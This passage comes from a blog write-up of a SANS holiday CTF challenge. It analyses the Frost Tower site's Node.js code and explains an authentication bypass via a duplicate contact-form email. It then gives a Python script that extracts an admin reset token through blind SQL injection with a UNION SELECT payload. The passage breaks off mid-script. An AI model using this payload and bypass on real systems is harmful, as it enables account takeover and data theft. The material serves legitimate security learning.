    &lt;span class="nx"&gt;tempCont&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;SELECT * from uniquecontact order by date_created desc&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;rows&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;fields&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;sendStatus&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;rowdata&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;rows&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;render&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;contact&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="s1"&gt;&amp;#39;title&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Contact Us&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                &lt;span class="s1"&gt;&amp;#39;strcountry&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;countrybuf_tostring&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                &lt;span class="s1"&gt;&amp;#39;rowdata&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;rowdata&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                &lt;span class="s1"&gt;&amp;#39;csrfToken&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;csrfToken&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
                &lt;span class="s1"&gt;&amp;#39;userlogin&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;session&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;userfullname&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This is a simple contact form, where you input your name, email address,
phone number, and country, and the application stores all your data so that
it can contacts you later (given Jack Frost's profile, I'd say that it's for
advertising purposes).&lt;/p&gt;
&lt;p&gt;We also see an endpoint called &lt;code&gt;detail&lt;/code&gt; that seems to be vulnerable to
SQL injections:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/detail/:id&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;session&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;session&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;reqparam&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;params&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;id&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;query&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;SELECT * FROM uniquecontact WHERE id=&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="hll"&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;session&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;uniqueID&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
&lt;/span&gt;
        &lt;span class="k"&gt;try&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;reqparam&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;indexOf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;,&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
&lt;/span&gt;                &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;ids&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;reqparam&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;,&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="nx"&gt;reqparam&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;0&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ids&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
&lt;span class="hll"&gt;                    &lt;span class="nx"&gt;query&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="nx"&gt;tempCont&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;escape&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;m&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;raw&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ids&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]));&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;                    &lt;span class="nx"&gt;query&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot; OR id=&amp;quot;&lt;/span&gt;
&lt;/span&gt;                &lt;span class="p"&gt;}&lt;/span&gt;
                &lt;span class="nx"&gt;query&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;?&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nx"&gt;query&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;SELECT * FROM uniquecontact WHERE id=?&amp;quot;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;sendStatus&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="nx"&gt;tempCont&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;reqparam&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;rows&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;fields&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Basically, the endpoint takes a parameter called &lt;code&gt;id&lt;/code&gt;. If &lt;code&gt;id&lt;/code&gt;
is a comma-separated list of indexes, it splits this list and concatenate
each index to the query string. Even if it's calling the &lt;code&gt;escape&lt;/code&gt;
method, we don't need any special characters to break the syntax. This means
that &lt;code&gt;escape&lt;/code&gt; won't escape anything.&lt;/p&gt;
&lt;p&gt;There is unfortunately one small problem: we need to be authenticated to access
this functionality. Indeed, the attribute &lt;code&gt;session.uniqueID&lt;/code&gt; must be set
so that this code block is evaluated. However, by default,
&lt;code&gt;session.uniqueID&lt;/code&gt; is not set. This means that we need to find a way to
bypass authentication.&lt;/p&gt;
&lt;p&gt;If we look in the code for lines were &lt;code&gt;session.uniqueID&lt;/code&gt; is set, we find
an interesting place in an endpoint that is accessible with an unauthenticated
user:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/postcontact&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;fullname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;xss&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nx"&gt;ReplaceAnyMatchingWords&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;fullname&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;email&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;xss&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nx"&gt;ReplaceAnyMatchingWords&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;email&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;phone&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;xss&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nx"&gt;ReplaceAnyMatchingWords&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;phone&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;country&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;xss&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nx"&gt;ReplaceAnyMatchingWords&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;country&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;date&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nb"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;d&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getDate&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;mo&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getMonth&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;yr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getFullYear&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;current_hour&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getHours&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;date_created&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;dateFormat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;yyyy-mm-dd hh:MM:ss&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="nx"&gt;tempCont&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;SELECT * from uniquecontact where email=&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;tempCont&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;escape&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;email&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;rows&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;fields&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;sendStatus&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;rowlength&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;rows&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="hll"&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;rowlength&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
&lt;/span&gt;            &lt;span class="nx"&gt;session&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;session&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="hll"&gt;            &lt;span class="nx"&gt;session&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;uniqueID&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;email&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;            &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;flash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;info&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Email Already Exists&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;redirect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;/contact&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When we fill out the contact form, the application checks if the given email
address is already stored in the database. If that's the case, then it sends
a message saying that the email already exists, and &lt;strong&gt;stores this email
address in&lt;/strong&gt; &lt;code&gt;session.uniqueID&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Therefore, if we fill out the contact form with the same email address twice,
the application will think that we are authenticated. That's some weird logic
error, but hey, I won't complain:&lt;/p&gt;
&lt;img alt="On the left, the Frost Tower contact form filled with bogus information. The email address is jackfroststinks&amp;#64;xxx.com. On the right, the web interface when we send the info. We get a message saying &amp;quot;Data saved to database!&amp;quot;" class="align-center" src="/images/sans-christmas-challenge-2021/frost_tower_contact_form_1.png" /&gt;
&lt;img alt="On the left, the Frost Tower contact form filled with the same bogus information as before. On the right, the web interface when we send the info for a second time. We get a message saying &amp;quot;Email already exists&amp;quot;." class="align-center" src="/images/sans-christmas-challenge-2021/frost_tower_contact_form_2.png" /&gt;
&lt;p&gt;Now, let's try to access an endpoint reserved to authenticated users, such as
&lt;a class="reference external" href="https://staging.jackfrosttower.com/dashboard"&gt;https://staging.jackfrosttower.com/dashboard&lt;/a&gt;:&lt;/p&gt;
&lt;img alt="The Frost Tower dashboard. We see the contact information sent by other users. It's mostly garbage sent by other KringleCon attendees." class="align-center" src="/images/sans-christmas-challenge-2021/frost_tower_logged_in.png" /&gt;
&lt;p&gt;Alright, we're logged in! Now we can exploit the SQL injection.&lt;/p&gt;
&lt;p&gt;I first tried to use the SQL injection to gain administrative access to the
dashboard, by listing other users, issuing a password reset request for the
admin, and using the SQL injection to read the reset token. This allowed me to
log in as &lt;code&gt;root&amp;#64;localhost&lt;/code&gt;. Here's the Python code I used:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;string&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;requests&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;charset&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ascii_letters&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;digits&lt;/span&gt;
    &lt;span class="n"&gt;token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;url_template&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;https://staging.jackfrosttower.com/detail/1 union select * from users where email=&amp;quot;root@localhost&amp;quot; and token like &amp;quot;{}{}%&amp;quot;,2&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;cookies&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;_csrf&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;O64M0G273Zx5909x0W4sZHyv&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;connect.sid&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;s%3A2ioEFCFp9O1O9AKD12qiLbkF8Uegu2XG.n%2BFy9MLyoVBQ&lt;/span&gt;&lt;span class="si"&gt;%2F&lt;/span&gt;&lt;span class="s1"&gt;6Z6WlTWJD5npHvtEjDKVCkln3YklzQ&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Token: &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;end&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flush&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;charset&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;url_template&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cookies&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;cookies&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Not found!!&amp;#39;&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
